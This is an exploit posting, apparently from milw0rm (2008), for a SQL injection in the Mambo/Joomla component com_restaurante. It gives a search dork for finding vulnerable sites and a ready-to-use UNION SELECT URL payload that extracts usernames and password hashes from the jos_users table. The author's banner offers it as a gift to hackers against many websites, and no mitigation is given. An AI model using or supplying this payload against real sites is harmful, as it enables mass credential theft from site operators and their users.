55 lines
No EOL
1.6 KiB
Text
55 lines
No EOL
1.6 KiB
Text
##########################################
|
|
#
|
|
# Mambo Component com_restaurante SQL Injection
|
|
#
|
|
##########################################
|
|
#
|
|
##AUTHOR : S@BUN
|
|
#
|
|
####HOME : http://www.milw0rm.com/author/1334
|
|
#
|
|
####MAÄ°L : hackturkiye.hackturkiye@gmail.com
|
|
#
|
|
############################################
|
|
TODAY MY BÄ°RTDAY
|
|
SOO I WROTE 5 BUGS ALL FOR HACKERS
|
|
5 EXPLOÄ°T HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE
|
|
DONT FORGET MY PRESENT HACKERS
|
|
GOOD LUCKY
|
|
|
|
100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi
|
|
YASGUNUM NEDENiYLE HEDiYE
|
|
iYi SANLAR
|
|
|
|
you can see all my exploits
|
|
|
|
http://my.opera.com/SQL-Injection/blog/
|
|
|
|
###########################################
|
|
#
|
|
# DORK 1 : allinurl: "com_restaurante"
|
|
#
|
|
###########################################
|
|
EXPLOIT :
|
|
|
|
index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/*
|
|
|
|
|
|
###########################################
|
|
##################S@BUN####################
|
|
###########################################
|
|
#####hackturkiye.hackturkiye@gmail.com#####
|
|
###########################################
|
|
|
|
side note:
|
|
<name>Restaurante</name>
|
|
<author>Detodas</author>
|
|
<creationDate>31-07-2007</creationDate>
|
|
<license>This component is released under the GNU/GPL License</license>
|
|
<authorEmail>detodo@masde50.net</authorEmail>
|
|
|
|
<authorUrl>www.detodo.masde50.net</authorUrl>
|
|
<version>1.0</version>
|
|
<description>The structure of this component is based on the structure of the component Alberghi by Vamba</description>
|
|
|
|
# milw0rm.com [2008-03-19] |